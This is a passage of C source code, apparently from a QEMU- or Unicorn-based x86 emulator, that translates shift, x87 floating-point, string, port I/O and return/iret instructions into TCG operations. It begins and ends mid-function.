ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; op = (modrm >> 3) & 7; if (mod != 3) { if (shift == 2) { s->rip_offset = 1; } gen_lea_modrm(env, s, modrm); opreg = OR_TMP0; } else { opreg = (modrm & 7) | REX_B(s); } /* simpler op */ if (shift == 0) { gen_shift(s, op, ot, opreg, OR_ECX); } else { if (shift == 2) { shift = x86_ldub_code(env, s); } gen_shifti(s, op, ot, opreg, shift); } } break; case 0xd0: case 0xd1: /* shift Ev,1 */ shift = 1; goto grp2_label; case 0xd2: case 0xd3: /* shift Ev,cl */ shift = 0; goto grp2_label; case 0x1a4: /* shld imm */ op = 0; shift = 1; goto do_shiftd; case 0x1a5: /* shld cl */ op = 0; shift = 0; goto do_shiftd; case 0x1ac: /* shrd imm */ op = 1; shift = 1; goto do_shiftd; case 0x1ad: /* shrd cl */ op = 1; shift = 0; do_shiftd: ot = dflag; modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); reg = ((modrm >> 3) & 7) | rex_r; if (mod != 3) { gen_lea_modrm(env, s, modrm); opreg = OR_TMP0; } else { opreg = rm; } gen_op_mov_v_reg(s, ot, s->T1, reg); if (shift) { TCGv imm = tcg_const_tl(tcg_ctx, x86_ldub_code(env, s)); gen_shiftd_rm_T1(s, ot, opreg, op, imm); tcg_temp_free(tcg_ctx, imm); } else { gen_shiftd_rm_T1(s, ot, opreg, op, tcg_ctx->cpu_regs[R_ECX]); } break; /************************/ /* floats */ case 0xd8: case 0xd9: case 0xda: case 0xdb: case 0xdc: case 0xdd: case 0xde: case 0xdf: { bool update_fip = true; if (s->flags & (HF_EM_MASK | HF_TS_MASK)) { /* if CR0.EM or CR0.TS are set, generate an FPU exception */ /* XXX: what to do if illegal op ? 
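One defensible reading: the device-not-available check fires before the ESC opcode is decoded any further, so raising #NM (EXCP07_PREX) here even for encodings that would otherwise be #UD is at least self-consistent. That priority is an assumption about hardware behaviour, not something the surrounding code verifies.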
*/ gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); break; } modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; rm = modrm & 7; op = ((b & 7) << 3) | ((modrm >> 3) & 7); if (mod != 3) { /* memory op */ AddressParts a = gen_lea_modrm_0(env, s, modrm); TCGv ea = gen_lea_modrm_1(s, a); TCGv last_addr = tcg_temp_new(tcg_ctx); bool update_fdp = true; tcg_gen_mov_tl(tcg_ctx, last_addr, ea); gen_lea_v_seg(s, s->aflag, ea, a.def_seg, s->override); switch(op) { case 0x00: /* fxxxs */ case 0x01: /* fxxxs */ case 0x02: /* fxxxs */ case 0x03: /* fxxxs */ case 0x04: /* fxxxs */ case 0x05: /* fxxxs */ case 0x06: /* fxxxs */ case 0x07: /* fxxxs */ case 0x10: /* fixxxl */ case 0x11: /* fixxxl */ case 0x12: /* fixxxl */ case 0x13: /* fixxxl */ case 0x14: /* fixxxl */ case 0x15: /* fixxxl */ case 0x16: /* fixxxl */ case 0x17: /* fixxxl */ case 0x20: /* fxxxl */ case 0x21: /* fxxxl */ case 0x22: /* fxxxl */ case 0x23: /* fxxxl */ case 0x24: /* fxxxl */ case 0x25: /* fxxxl */ case 0x26: /* fxxxl */ case 0x27: /* fxxxl */ case 0x30: /* fixxx */ case 0x31: /* fixxx */ case 0x32: /* fixxx */ case 0x33: /* fixxx */ case 0x34: /* fixxx */ case 0x35: /* fixxx */ case 0x36: /* fixxx */ case 0x37: /* fixxx */ { int op1; op1 = op & 7; switch(op >> 4) { case 0: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); gen_helper_flds_FT0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case 1: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); gen_helper_fildl_FT0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case 2: tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); gen_helper_fldl_FT0(tcg_ctx, tcg_ctx->cpu_env, s->tmp1_i64); break; case 3: default: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LESW); gen_helper_fildl_FT0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; } gen_helper_fp_arith_ST0_FT0(tcg_ctx, op1); if (op1 == 3) { /* fcomp needs pop */ gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); } } break; case 0x08: /* flds */ case 0x0a: /* fsts */ case 0x0b: /* fstps */ case 0x18: /* fildl, fisttpl, fistl, fistpl */ case 0x19: /* fildl, fisttpl, fistl, fistpl */ case 0x1a: /* fildl, fisttpl, fistl, fistpl */ case 0x1b: /* fildl, fisttpl, fistl, fistpl */ case 0x28: /* fldl, fisttpll, fstl, fstpl */ case 0x29: /* fldl, fisttpll, fstl, fstpl */ case 0x2a: /* fldl, fisttpll, fstl, fstpl */ case 0x2b: /* fldl, fisttpll, fstl, fstpl */ case 0x38: /* filds, fisttps, fists, fistps */ case 0x39: /* filds, fisttps, fists, fistps */ case 0x3a: /* filds, fisttps, fists, fistps */ case 0x3b: /* filds, fisttps, fists, fistps */ switch(op & 7) { case 0: switch(op >> 4) { case 0: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); gen_helper_flds_ST0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case 1: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); gen_helper_fildl_ST0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case 2: tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); gen_helper_fldl_ST0(tcg_ctx, tcg_ctx->cpu_env, s->tmp1_i64); break; case 3: default: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LESW); gen_helper_fildl_ST0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; } break; case 1: /* XXX: the corresponding CPUID bit must be tested ! 
*/ switch(op >> 4) { case 1: gen_helper_fisttl_ST0(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); break; case 2: gen_helper_fisttll_ST0(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); break; case 3: default: gen_helper_fistt_ST0(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUW); break; } gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; default: switch(op >> 4) { case 0: gen_helper_fsts_ST0(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); break; case 1: gen_helper_fistl_ST0(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); break; case 2: gen_helper_fstl_ST0(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); break; case 3: default: gen_helper_fist_ST0(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUW); break; } if ((op & 7) == 3) gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; } break; case 0x0c: /* fldenv mem */ gen_helper_fldenv(tcg_ctx, tcg_ctx->cpu_env, s->A0, tcg_const_i32(tcg_ctx, dflag - 1)); update_fip = update_fdp = false; break; case 0x0d: /* fldcw mem */ tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUW); gen_helper_fldcw(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); update_fip = update_fdp = false; break; case 0x0e: /* fnstenv mem */ gen_helper_fstenv(tcg_ctx, tcg_ctx->cpu_env, s->A0, tcg_const_i32(tcg_ctx, dflag - 1)); update_fip = update_fdp = false; break; case 0x0f: /* fnstcw mem */ gen_helper_fnstcw(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUW); update_fip = update_fdp = false; break; case 0x1d: /* fldt mem */ gen_helper_fldt_ST0(tcg_ctx, tcg_ctx->cpu_env, s->A0); break; case 0x1f: /* fstpt mem */ gen_helper_fstt_ST0(tcg_ctx, tcg_ctx->cpu_env, s->A0); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x2c: /* frstor mem */ gen_helper_frstor(tcg_ctx, tcg_ctx->cpu_env, s->A0, tcg_const_i32(tcg_ctx, dflag - 1)); update_fip = update_fdp = false; break; case 0x2e: /* fnsave mem */ gen_helper_fsave(tcg_ctx, tcg_ctx->cpu_env, s->A0, tcg_const_i32(tcg_ctx, dflag - 1)); update_fip = update_fdp = false; break; case 0x2f: /* fnstsw mem */ gen_helper_fnstsw(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUW); update_fip = update_fdp = false; break; case 0x3c: /* fbld */ gen_helper_fbld_ST0(tcg_ctx, tcg_ctx->cpu_env, s->A0); break; case 0x3e: /* fbstp */ gen_helper_fbst_ST0(tcg_ctx, tcg_ctx->cpu_env, s->A0); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x3d: /* fildll */ tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); gen_helper_fildll_ST0(tcg_ctx, tcg_ctx->cpu_env, s->tmp1_i64); break; case 0x3f: /* fistpll */ gen_helper_fistll_ST0(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; default: goto unknown_op; } if (update_fdp) { int last_seg = s->override >= 0 ? 
s->override : a.def_seg; tcg_gen_ld_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, segs[last_seg].selector)); tcg_gen_st16_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, fpds)); tcg_gen_st_tl(tcg_ctx, last_addr, tcg_ctx->cpu_env, offsetof(CPUX86State, fpdp)); } tcg_temp_free(tcg_ctx, last_addr); } else { /* register float ops */ opreg = rm; switch(op) { case 0x08: /* fld sti */ gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fmov_ST0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, (opreg + 1) & 7)); break; case 0x09: /* fxchg sti */ case 0x29: /* fxchg4 sti, undocumented op */ case 0x39: /* fxchg7 sti, undocumented op */ gen_helper_fxchg_ST0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); break; case 0x0a: /* grp d9/2 */ switch(rm) { case 0: /* fnop */ /* check exceptions (FreeBSD FPU probe) */ gen_helper_fwait(tcg_ctx, tcg_ctx->cpu_env); update_fip = false; break; default: goto unknown_op; } break; case 0x0c: /* grp d9/4 */ switch(rm) { case 0: /* fchs */ gen_helper_fchs_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 1: /* fabs */ gen_helper_fabs_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 4: /* ftst */ gen_helper_fldz_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 5: /* fxam */ gen_helper_fxam_ST0(tcg_ctx, tcg_ctx->cpu_env); break; default: goto unknown_op; } break; case 0x0d: /* grp d9/5 */ { switch(rm) { case 0: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fld1_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 1: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldl2t_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 2: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldl2e_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 3: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldpi_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 4: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldlg2_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 5: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldln2_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 6: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldz_ST0(tcg_ctx, tcg_ctx->cpu_env); break; default: goto unknown_op; } } break; case 0x0e: /* grp d9/6 */ switch(rm) { case 0: /* f2xm1 */ gen_helper_f2xm1(tcg_ctx, tcg_ctx->cpu_env); break; case 1: /* fyl2x */ gen_helper_fyl2x(tcg_ctx, tcg_ctx->cpu_env); break; case 2: /* fptan */ gen_helper_fptan(tcg_ctx, tcg_ctx->cpu_env); break; case 3: /* fpatan */ gen_helper_fpatan(tcg_ctx, tcg_ctx->cpu_env); break; case 4: /* fxtract */ gen_helper_fxtract(tcg_ctx, tcg_ctx->cpu_env); break; case 5: /* fprem1 */ gen_helper_fprem1(tcg_ctx, tcg_ctx->cpu_env); break; case 6: /* fdecstp */ gen_helper_fdecstp(tcg_ctx, tcg_ctx->cpu_env); break; default: case 7: /* fincstp */ gen_helper_fincstp(tcg_ctx, tcg_ctx->cpu_env); break; } break; case 0x0f: /* grp d9/7 */ switch(rm) { case 0: /* fprem */ gen_helper_fprem(tcg_ctx, tcg_ctx->cpu_env); break; case 1: /* fyl2xp1 */ gen_helper_fyl2xp1(tcg_ctx, tcg_ctx->cpu_env); break; case 2: /* fsqrt */ gen_helper_fsqrt(tcg_ctx, tcg_ctx->cpu_env); break; case 3: /* fsincos */ gen_helper_fsincos(tcg_ctx, tcg_ctx->cpu_env); break; case 5: /* fscale */ gen_helper_fscale(tcg_ctx, tcg_ctx->cpu_env); break; case 4: /* frndint */ gen_helper_frndint(tcg_ctx, tcg_ctx->cpu_env); break; case 6: /* fsin */ gen_helper_fsin(tcg_ctx, tcg_ctx->cpu_env); break; default: case 7: /* fcos */ gen_helper_fcos(tcg_ctx, tcg_ctx->cpu_env); break; } break; case 0x00: case 
0x01: case 0x04: /* fxxx st, sti */ case 0x05: /* fxxx st, sti */ case 0x06: /* fxxx st, sti */ case 0x07: /* fxxx st, sti */ case 0x20: case 0x21: case 0x24: /* fxxx sti, st */ case 0x25: /* fxxx sti, st */ case 0x26: /* fxxx sti, st */ case 0x27: /* fxxx sti, st */ case 0x30: case 0x31: case 0x34: /* fxxxp sti, st */ case 0x35: /* fxxxp sti, st */ case 0x36: /* fxxxp sti, st */ case 0x37: /* fxxxp sti, st */ { int op1; op1 = op & 7; if (op >= 0x20) { gen_helper_fp_arith_STN_ST0(tcg_ctx, op1, opreg); if (op >= 0x30) gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); } else { gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fp_arith_ST0_FT0(tcg_ctx, op1); } } break; case 0x02: /* fcom */ case 0x22: /* fcom2, undocumented op */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 0x03: /* fcomp */ case 0x23: /* fcomp3, undocumented op */ case 0x32: /* fcomp5, undocumented op */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x15: /* da/5 */ switch(rm) { case 1: /* fucompp */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 1)); gen_helper_fucom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; default: goto unknown_op; } break; case 0x1c: switch(rm) { case 0: /* feni (287 only, just do nop here) */ break; case 1: /* fdisi (287 only, just do nop here) */ break; case 2: /* fclex */ gen_helper_fclex(tcg_ctx, tcg_ctx->cpu_env); update_fip = false; break; case 3: /* fninit */ gen_helper_fninit(tcg_ctx, tcg_ctx->cpu_env); update_fip = false; break; case 4: /* fsetpm (287 only, just do nop here) */ break; default: goto unknown_op; } break; case 0x1d: /* fucomi */ if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } gen_update_cc_op(s); gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fucomi_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x1e: /* fcomi */ if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } gen_update_cc_op(s); gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fcomi_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x28: /* ffree sti */ gen_helper_ffree_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); break; case 0x2a: /* fst sti */ gen_helper_fmov_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); break; case 0x2b: /* fstp sti */ case 0x0b: /* fstp1 sti, undocumented op */ case 0x3a: /* fstp8 sti, undocumented op */ case 0x3b: /* fstp9 sti, undocumented op */ gen_helper_fmov_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x2c: /* fucom st(i) */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fucom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 0x2d: /* fucomp st(i) */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fucom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x33: /* de/3 */ switch(rm) { case 1: /* fcompp */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 1)); 
gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; default: goto unknown_op; } break; case 0x38: /* ffreep sti, undocumented op */ gen_helper_ffree_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x3c: /* df/4 */ switch(rm) { case 0: gen_helper_fnstsw(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_extu_i32_tl(tcg_ctx, s->T0, s->tmp2_i32); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); break; default: goto unknown_op; } break; case 0x3d: /* fucomip */ if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } gen_update_cc_op(s); gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fucomi_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x3e: /* fcomip */ if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } gen_update_cc_op(s); gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fcomi_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x10: /* fcmovxx */ case 0x11: /* fcmovxx */ case 0x12: /* fcmovxx */ case 0x13: /* fcmovxx */ case 0x18: case 0x19: case 0x1a: case 0x1b: { int op1; TCGLabel *l1; static const uint8_t fcmov_cc[8] = { (JCC_B << 1), (JCC_Z << 1), (JCC_BE << 1), (JCC_P << 1), }; if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } op1 = fcmov_cc[op & 3] | (((op >> 3) & 1) ^ 1); l1 = gen_new_label(tcg_ctx); gen_jcc1_noeob(s, op1, l1); gen_helper_fmov_ST0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_set_label(tcg_ctx, l1); } break; default: goto unknown_op; } } if (update_fip) { tcg_gen_ld_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, segs[R_CS].selector)); tcg_gen_st16_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, fpcs)); tcg_gen_st_tl(tcg_ctx, tcg_const_tl(tcg_ctx, pc_start - s->cs_base), tcg_ctx->cpu_env, offsetof(CPUX86State, fpip)); } } break; /************************/ /* string ops */ case 0xa4: /* movsS */ case 0xa5: ot = mo_b_d(b, dflag); if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { gen_repz_movs(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); } else { gen_movs(s, ot); } break; case 0xaa: /* stosS */ case 0xab: ot = mo_b_d(b, dflag); if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { gen_repz_stos(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); } else { gen_stos(s, ot); } break; case 0xac: /* lodsS */ case 0xad: ot = mo_b_d(b, dflag); if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { gen_repz_lods(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); } else { gen_lods(s, ot); } break; case 0xae: /* scasS */ case 0xaf: ot = mo_b_d(b, dflag); if (prefixes & PREFIX_REPNZ) { gen_repz_scas(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 1); } else if (prefixes & PREFIX_REPZ) { gen_repz_scas(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 0); } else { gen_scas(s, ot); } break; case 0xa6: /* cmpsS */ case 0xa7: ot = mo_b_d(b, dflag); if (prefixes & PREFIX_REPNZ) { gen_repz_cmps(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 1); } else if (prefixes & PREFIX_REPZ) { gen_repz_cmps(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 0); } else { gen_cmps(s, ot); } break; case 0x6c: /* insS */ case 0x6d: ot = mo_b_d32(b, dflag); tcg_gen_ext16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[R_EDX]); gen_check_io(s, ot, pc_start - 
s->cs_base, SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes) | 4); if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { gen_repz_ins(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); } else { gen_ins(s, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } } break; case 0x6e: /* outsS */ case 0x6f: ot = mo_b_d32(b, dflag); tcg_gen_ext16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[R_EDX]); gen_check_io(s, ot, pc_start - s->cs_base, svm_is_rep(prefixes) | 4); if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { gen_repz_outs(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); } else { gen_outs(s, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } } break; /************************/ /* port I/O */ case 0xe4: case 0xe5: ot = mo_b_d32(b, dflag); val = x86_ldub_code(env, s); tcg_gen_movi_tl(tcg_ctx, s->T0, val); gen_check_io(s, ot, pc_start - s->cs_base, SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes)); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, val); gen_helper_in_func(tcg_ctx, ot, s->T1, s->tmp2_i32); gen_op_mov_reg_v(s, ot, R_EAX, s->T1); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; case 0xe6: case 0xe7: ot = mo_b_d32(b, dflag); val = x86_ldub_code(env, s); tcg_gen_movi_tl(tcg_ctx, s->T0, val); gen_check_io(s, ot, pc_start - s->cs_base, svm_is_rep(prefixes)); gen_op_mov_v_reg(s, ot, s->T1, R_EAX); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, val); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, s->T1); gen_helper_out_func(tcg_ctx, ot, s->tmp2_i32, s->tmp3_i32); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; case 0xec: case 0xed: ot = mo_b_d32(b, dflag); tcg_gen_ext16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[R_EDX]); gen_check_io(s, ot, pc_start - s->cs_base, SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes)); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_in_func(tcg_ctx, ot, s->T1, s->tmp2_i32); gen_op_mov_reg_v(s, ot, R_EAX, s->T1); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; case 0xee: case 0xef: ot = mo_b_d32(b, dflag); tcg_gen_ext16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[R_EDX]); gen_check_io(s, ot, pc_start - s->cs_base, svm_is_rep(prefixes)); gen_op_mov_v_reg(s, ot, s->T1, R_EAX); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, s->T1); gen_helper_out_func(tcg_ctx, ot, s->tmp2_i32, s->tmp3_i32); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; /************************/ /* control */ case 0xc2: /* ret im */ val = x86_ldsw_code(env, s); ot = gen_pop_T0(s); gen_stack_update(s, val + (1 << ot)); /* Note that gen_pop_T0 uses a zero-extending load. */ gen_op_jmp_v(tcg_ctx, s->T0); gen_bnd_jmp(s); gen_jr(s, s->T0); break; case 0xc3: /* ret */ ot = gen_pop_T0(s); gen_pop_update(s, ot); /* Note that gen_pop_T0 uses a zero-extending load. 
*/ gen_op_jmp_v(tcg_ctx, s->T0); gen_bnd_jmp(s); gen_jr(s, s->T0); break; case 0xca: /* lret im */ val = x86_ldsw_code(env, s); do_lret: if (s->pe && !s->vm86) { gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_lret_protected(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1), tcg_const_i32(tcg_ctx, val)); } else { gen_stack_A0(s); /* pop offset */ gen_op_ld_v(s, dflag, s->T0, s->A0); /* NOTE: keeping EIP updated is not a problem in case of exception */ gen_op_jmp_v(tcg_ctx, s->T0); /* pop selector */ gen_add_A0_im(s, 1 << dflag); gen_op_ld_v(s, dflag, s->T0, s->A0); gen_op_movl_seg_T0_vm(s, R_CS); /* add stack offset */ gen_stack_update(s, val + (2 << dflag)); } gen_eob(s); break; case 0xcb: /* lret */ val = 0; goto do_lret; case 0xcf: /* iret */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_IRET); if (!s->pe) { /* real mode */ gen_helper_iret_real(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); set_cc_op(s, CC_OP_EFLAGS); } else if (s->vm86) { if 